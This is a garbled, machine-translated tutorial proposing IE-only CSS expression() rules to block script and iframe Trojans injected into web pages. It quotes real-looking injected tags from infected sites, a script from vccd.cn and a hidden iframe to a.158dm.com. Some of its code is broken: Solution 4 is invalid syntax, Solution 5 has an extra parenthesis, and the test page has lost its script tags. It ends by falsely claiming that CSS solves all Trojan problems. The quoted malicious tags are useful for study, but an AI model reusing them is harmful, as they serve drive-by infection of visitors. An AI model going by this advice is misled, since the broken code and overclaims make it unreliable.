Two lines of code to solve all web page Trojans_javascript skills

Not long ago, a line of code solved the problem of iframe malware (including server-side injection, client-side ARP injection, etc.), which was recognized by many friends. This is indeed a good way to avoid wind and rain. But now the way to hang Internet Trojans has really changed as I expected. Nowadays it is popular to hang "script" Trojans. I am so embarrassed. I have seen several netizens' websites that have been like this - the top or bottom of the page has been added:

Attention, the following address contains Trojans, please do not access it easily:






< ;script src=http://vccd.cn>

I’m so sweaty, I inserted N same ones in a row The <script> tag. My computer has been patched, so I directly accessed this http://vccd.cn (or directly downloaded it using Thunder), and um~ it appeared: <br><br>document.write("<div style='display :none'>") <br>document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>" ) <br>document.write("</div>") <br>I also used Thunder to download the file http://a.158dm.com/b1.htm. At first glance, I saw a mess of JS coding, sweat, but I found a number similar to a QQ number, and looked it up directly. Khan, and then there was an organization that specialized in providing online horse racing. Hey, what a world. The fees are quite high! <br><br>... <br>var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\XXXXXLD"; Kfqq = Qqs; <br>(...omitted ) (There are N statistical JS codes below) <br> Regarding the above situation, I can’t just ignore it in vain. Think of a way, brother. I had a bowl of mung bean porridge, which contained a lot of sugar and was delicious. I thought of a way. A little analysis gave me the answer. Let’s take a look, what are the characteristics of <script>Trojan: <br><br><script src=http://vccd.cn></script>

By the way, script Trojan The src is generally from a foreign domain, that is, the src starts with http. If it is a script on your own website, you generally don’t need to add http; look at the original shape of the Trojan, it still outputs iframe, JS code or other< object>code, no matter how many there are, kill as many as they come.

Come write CSS with me and get them one by one. I wrote 5 different solutions. Let’s test them:

Solution 1:

Copy code The code is as follows:

iframe{n1ifm:expression(this.src='about:blank',this .outerHTML='');}/*This line of code is to solve the problem of hanging IFRAME Trojan*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0) ?document.write('The Trojan was successfully isolated!'):'');}

Principle: Take out the src marked with <script> and convert it to lowercase, and then check whether it starts with "http" If it is an external domain JS script file, the page content will be cleared and "Trojan was successfully isolated!" will be written. Otherwise, it displays normally. <br><br>Disadvantages: Visitors cannot see pages infected with <script> Trojans. <br><br>Solution 2: <br><br><div class="codetitle"> <span><a style="CURSOR: pointer" data="41849" class="copybut" id="copybut41849" onclick="doCopy('code41849')"><u>Copy the code</u></a></span> The code is as follows:</div> <div class="codebody" id="code41849"> <br>iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} <br>script{no2js:expression((this.src.toLowerCase().indexOf('http') ==0)?document.close():'');} <br> </div> <br>Principle: Use document.close() to forcefully close the document.write() of the JS file in the external domain. The Trojan content has not had time to be written, only part of it has been forced to be cached and output, and the rest will not be written again <br>Solution 3: <br><br><div class="codetitle"> <span><a style="CURSOR: pointer" data="19823" class="copybut" id="copybut19823" onclick="doCopy('code19823')"><u>Copy Code</u></a></span> The code is as follows:</div> <div class="codebody" id="code19823"> <br>iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} <br> script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} <br> </div> <br>Principle: When a JS file arrives in an external domain, IE's private execCommand method is immediately called to stop all requests for the page, so the subsequent JS files from the external domain are also forced to stop downloading. It's like clicking the "Stop" button on your browser. It seems this is a way for JS to simulate the IE stop button. <br><br>Solution４: <br><br><div class="codetitle"> <span><a style="CURSOR: pointer" data="59344" class="copybut" id="copybut59344" onclick="doCopy('code59344')"><u>Copy code</u></a></span> The code is as follows:</div> <div class="codebody" id="code59344"> <br>iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} <br>script{noj4s:expression(if(this.src.indexOf('http')==0 )this.src='res://ieframe.dll/dnserror.htm');} <br> </div> <br>Principle: Rewrite the src of the JS file in the external domain to the address of the local IE404 error page, like this , JS code from external domains will not be downloaded. <br><br>Solution 5: <br><br><div class="codetitle"> <span><a style="CURSOR: pointer" data="40781" class="copybut" id="copybut40781" onclick="doCopy('code40781')"><u>Copy the code</u></a></span> The code is as follows:</div> <div class="codebody" id="code40781"> <br>iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} <br>script{noj5s:expression((this.id.toLowerCase().indexOf('lh') ==0)?document.write('The Trojan was successfully isolated!'):''));} <br> </div> <br>In the fifth option, the page HTML source code <script> should be added with the following "lh" is the id prefixed, such as lhWeatherJSapi, <script src="***/**.js" id="lhSearchJSapi"></script>

The following page code contains a Trojan address, and the Trojan is repeated 6 times on the page. Please use the different solutions I mentioned above to test it. , see how my research goes! (This test is dangerous, please be sure to apply all patches before testing)

Copy code The code is as follows:

< meta http-equiv="Content-Type" content="text/html; charset=utf-8" />






I am the 1 of the page itself

I am the 2 of the page itself

I am the page itself３

1.js belongs to my own website:

document.write("I am the JS file of this website") ;
document.write("");
My test environment is:

Windows XP SP2 and windows Vista SP1
IE6/IE7/IE8
have all been patched.

In summary, all current Trojan horse methods have been cracked. All Trojan horse problems can be solved with CSS, and visitors will no longer be easily poisoned.

Everyone should also study it carefully to see if there are any bugs in my code. If there are any, be sure to discuss them so that the problems can be solved! Or if you have other better methods, you can discuss them.